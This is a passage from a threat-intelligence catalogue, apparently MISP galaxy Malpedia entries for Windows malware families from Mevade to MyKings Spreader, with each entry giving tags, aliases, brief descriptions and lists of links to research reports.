https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/
https://blog.morphisec.com/fin7-attacks-restaurant-industry
http://www.secureworks.com/research/threat-profiles/gold-franklin
http://schierlm.users.sourceforge.net/avevasion.html
https://us-cert.cisa.gov/ncas/alerts/aa20-301a
http://www.secureworks.com/research/threat-profiles/gold-winter

Mevade

A botnet that used Tor .onion links for C&C.

The tag is: misp-galaxy:malpedia="Mevade"

Mevade is also known as:

SBC
Sefnit

Table 2200. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade
https://www.youtube.com/watch?v=FttiysUZmDw
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/
https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/

Mewsei

The tag is: misp-galaxy:malpedia="Mewsei"

Mewsei is also known as:

Table 2201. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei

MgBot

The tag is: misp-galaxy:malpedia="MgBot"

MgBot is also known as:

BLame
MgmBot

Table 2202. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot
https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/
https://twitter.com/GossiTheDog/status/1438500100238577670

Miancha

The tag is: misp-galaxy:malpedia="Miancha"

Miancha is also known as:

Table 2203. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha

Micrass

The tag is: misp-galaxy:malpedia="Micrass"

Micrass is also known as:

Table 2204. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass
https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/

MicroBackdoor

Open-source lightweight backdoor for C2 communication.

The tag is: misp-galaxy:malpedia="MicroBackdoor"

MicroBackdoor is also known as:

Table 2205. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor
https://github.com/cr4sh/microbackdoor

Microcin

The tag is: misp-galaxy:malpedia="Microcin"

Microcin is also known as:

Table 2206. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin
https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf
https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
https://github.com/dlegezo/common
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://securelist.com/apt-trends-report-q2-2019/91897/
https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/
https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/
https://securelist.com/microcin-is-here/97353/

Micropsia

The tag is: misp-galaxy:malpedia="Micropsia"

Micropsia is also known as:

Table 2207. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia
https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf
http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/
http://blog.talosintelligence.com/2017/06/palestine-delphi.html
https://research.checkpoint.com/apt-attack-middle-east-big-bang/
https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md

Mikoponi

The tag is: misp-galaxy:malpedia="Mikoponi"

Mikoponi is also known as:

Table 2208. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi
https://www.anomali.com/blog/targeted-ransomware-activity

Milan

The tag is: misp-galaxy:malpedia="Milan"

Milan is also known as:

Table 2209. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.milan
https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf

MILKMAID

The tag is: misp-galaxy:malpedia="MILKMAID"

MILKMAID is also known as:

Table 2210. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Milum

In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.

The tag is: misp-galaxy:malpedia="Milum"

Milum is also known as:

Table 2211. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.milum
https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://securelist.com/wildpressure-targets-macos/103072/

MimiKatz

The tag is: misp-galaxy:malpedia="MimiKatz"

MimiKatz is also known as:

Table 2212. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
https://blog.xpnsec.com/exploring-mimikatz-part-1/
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/
http://www.secureworks.com/research/threat-profiles/gold-burlap
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.secureworks.com/research/threat-profiles/gold-kingswood
http://www.secureworks.com/research/threat-profiles/gold-kingswood
https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/
https://www.secureworks.com/research/samsam-ransomware-campaigns
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://www.ic3.gov/Media/News/2021/210527.pdf
https://www.ic3.gov/Media/News/2021/210823.pdf
https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf
https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains
https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/
https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf
https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html
http://www.secureworks.com/research/threat-profiles/gold-franklin
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.ic3.gov/media/news/2020/200917-1.pdf
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://www.secureworks.com/research/threat-profiles/cobalt-hickman
https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos
https://www.slideshare.net/yurikamuraki5/active-directory-240348605
https://github.com/gentilkiwi/mimikatz
https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two
https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf
https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf
https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153
https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
https://twitter.com/swisscom_csirt/status/1354052879158571008
https://www.secureworks.com/research/threat-profiles/gold-drake
https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf
https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730
https://www.secureworks.com/research/threat-profiles/bronze-vinewood
https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf
https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf
https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
https://www.hvs-consulting.de/lazarus-report/
https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/
https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle
https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html
http://www.secureworks.com/research/threat-profiles/gold-drake
https://www.secureworks.com/blog/ransomware-deployed-by-adversary
https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/
https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html
https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/
https://us-cert.cisa.gov/ncas/alerts/aa20-275a
https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf
https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021
https://www.accenture.com/us-en/blogs/security/ransomware-hades
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions
https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/
https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html
https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://awakesecurity.com/blog/catching-the-white-stork-in-flight/
https://www.secureworks.com/research/threat-profiles/tin-woodlawn
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

MINEBRIDGE

The tag is: misp-galaxy:malpedia="MINEBRIDGE"

MINEBRIDGE is also known as:

GazGolder

Table 2213. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge
https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/
https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures
https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism
https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat
https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/

MiniASP

The tag is: misp-galaxy:malpedia="MiniASP"

MiniASP is also known as:

Table 2214. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

MiniDuke

The tag is: misp-galaxy:malpedia="MiniDuke"

MiniDuke is also known as:

Table 2215. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke
https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/
https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html
https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/
https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/
https://www.secureworks.com/research/threat-profiles/iron-hemlock

Mirage

The tag is: misp-galaxy:malpedia="Mirage"

Mirage is also known as:

Table 2216. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage
https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf
https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/
https://www.secureworks.com/research/threat-profiles/bronze-palace
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

MirageFox

The tag is: misp-galaxy:malpedia="MirageFox"

MirageFox is also known as:

Table 2217. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox
https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Mirai (Windows)

The tag is: misp-galaxy:malpedia="Mirai (Windows)"

Mirai (Windows) is also known as:

Table 2218. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai
https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/
https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://twitter.com/PhysicalDrive0/status/830070569202749440

MirrorBlast

The tag is: misp-galaxy:malpedia="MirrorBlast"

MirrorBlast is also known as:

Table 2219. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast
https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924
https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/

Misdat

The tag is: misp-galaxy:malpedia="Misdat"

Misdat is also known as:

Table 2220. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

Misfox

The tag is: misp-galaxy:malpedia="Misfox"

Misfox is also known as:

MixFox
ModPack

Table 2221. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox

Mispadu

According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

The tag is: misp-galaxy:malpedia="Mispadu"

Mispadu is also known as:

URSA

Table 2222. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu
https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/
https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces

MISTYVEAL

The tag is: misp-galaxy:malpedia="MISTYVEAL"

MISTYVEAL is also known as:

Table 2223. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mistyveal
https://www.epicturla.com/previous-works/hitb2020-voltron-sta

Miuref

The tag is: misp-galaxy:malpedia="Miuref"

Miuref is also known as:

Table 2224. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref

MM Core

The tag is: misp-galaxy:malpedia="MM Core"

MM Core is also known as:

Table 2225. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core

MobiRAT

The tag is: misp-galaxy:malpedia="MobiRAT"

MobiRAT is also known as:

Table 2226. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat
https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/

Mocton

The tag is: misp-galaxy:malpedia="Mocton"

Mocton is also known as:

Table 2227. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton

MoDi RAT

The tag is: misp-galaxy:malpedia="MoDi RAT"

MoDi RAT is also known as:

Table 2228. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.modirat
https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands/

ModPipe

The tag is: misp-galaxy:malpedia="ModPipe"

ModPipe is also known as:

Table 2229. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe
https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data
https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/

ModPOS

The tag is: misp-galaxy:malpedia="ModPOS"

ModPOS is also known as:

straxbot

Table 2230. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos
https://www.fireeye.com/blog/threat-research/2015/11/modpos.html
https://twitter.com/physicaldrive0/status/670258429202530306

Mofksys

The tag is: misp-galaxy:malpedia="Mofksys"

Mofksys is also known as:

Table 2231. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_MOFKSYS.A/

Moker

The tag is: misp-galaxy:malpedia="Moker"

Moker is also known as:

Table 2232. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.moker
https://breakingmalware.com/malware/moker-part-2-capabilities/
https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/
https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/
http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network

Mokes (Windows)

The tag is: misp-galaxy:malpedia="Mokes (Windows)"

Mokes (Windows) is also known as:

Table 2233. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes
https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/
https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/

Mole

The tag is: misp-galaxy:malpedia="Mole"

Mole is also known as:

Table 2234. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mole
https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware
https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/

MoleNet

MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017.

The tag is: misp-galaxy:malpedia="MoleNet"

MoleNet is also known as:

Table 2235. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet
https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

Molerat Loader

The tag is: misp-galaxy:malpedia="Molerat Loader"

Molerat Loader is also known as:

Table 2236. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader
https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east
http://www.clearskysec.com/iec/
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/
https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/

Monero Miner

The tag is: misp-galaxy:malpedia="Monero Miner"

Monero Miner is also known as:

CoinMiner

Table 2237. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner
https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/
https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/

MontysThree

The tag is: misp-galaxy:malpedia="MontysThree"

MontysThree is also known as:

Table 2238. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree
https://securelist.com/montysthree-industrial-espionage/98972/

MoonWind

The tag is: misp-galaxy:malpedia="MoonWind"

MoonWind is also known as:

Table 2239. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind
http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

MoriAgent

The tag is: misp-galaxy:malpedia="MoriAgent"

MoriAgent is also known as:

Table 2240. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent
https://securelist.com/apt-trends-report-q3-2020/99204/
https://twitter.com/Timele9527/status/1272776776335233024
https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#

Moriya

This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.

The tag is: misp-galaxy:malpedia="Moriya"

Moriya is also known as:

Table 2241. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya
https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/

Morphine

The tag is: misp-galaxy:malpedia="Morphine"

Morphine is also known as:

Table 2242. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine

Morto

The tag is: misp-galaxy:malpedia="Morto"

Morto is also known as:

Table 2243. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.morto
http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html
https://www.f-secure.com/weblog/archives/00002227.html
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A

Moserpass

The tag is: misp-galaxy:malpedia="Moserpass"

Moserpass is also known as:

Table 2244. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.moserpass
https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/

Mosquito

The tag is: misp-galaxy:malpedia="Mosquito"

Mosquito is also known as:

Table 2245. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito
https://www.recordedfuture.com/turla-apt-infrastructure/
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://securelist.com/shedding-skin-turlas-fresh-faces/88069/
https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/
https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/

Mount Locker

The tag is: misp-galaxy:malpedia="Mount Locker"

Mount Locker is also known as:

Table 2246. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker
https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry
https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/
https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates
https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines
https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/
https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/
https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/
https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/
https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html
https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/
https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker
https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/

Moure

The tag is: misp-galaxy:malpedia="Moure"

Moure is also known as:

Table 2247. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.moure

mozart

The tag is: misp-galaxy:malpedia="mozart"

mozart is also known as:

Table 2248. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart
https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html

MPKBot

The tag is: misp-galaxy:malpedia="MPKBot"

MPKBot is also known as:

Table 2249. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot
https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

MrDec

Ransomware.

The tag is: misp-galaxy:malpedia="MrDec"

MrDec is also known as:

Table 2250. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec
https://dissectingmalwa.re/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html

MrPeter

The tag is: misp-galaxy:malpedia="MrPeter"

MrPeter is also known as:

Table 2251. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mr_peter
https://github.com/mrfr05t/Mr.Peter

Multigrain POS

The tag is: misp-galaxy:malpedia="Multigrain POS"

Multigrain POS is also known as:

Table 2252. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos
https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/
https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html

murkytop

a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.

The tag is: misp-galaxy:malpedia="murkytop"

murkytop is also known as:

Table 2253. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://www.secureworks.com/research/threat-profiles/bronze-mohawk

Murofet

The tag is: misp-galaxy:malpedia="Murofet"

Murofet is also known as:

Table 2254. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet
https://www.wired.com/2017/03/russian-hacker-spy-botnet/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

Mutabaha

The tag is: misp-galaxy:malpedia="Mutabaha"

Mutabaha is also known as:

Table 2255. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha
http://vms.drweb.ru/virus/?_is=1&i=8477920

MyDogs

The tag is: misp-galaxy:malpedia="MyDogs"

MyDogs is also known as:

Table 2256. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs
https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html
https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html
https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/

MyDoom

The tag is: misp-galaxy:malpedia="MyDoom"

MyDoom is also known as:

Mimail
Novarg

Table 2257. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom
https://www.malware-traffic-analysis.net/2018/12/19/index.html
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503
https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069
http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf

MyKings Spreader

The tag is: misp-galaxy:malpedia="MyKings Spreader"

MyKings Spreader is also known as:

Table 2258. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader
https://blog.talosintelligence.com/2020/07/valak-emerges.html
https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf
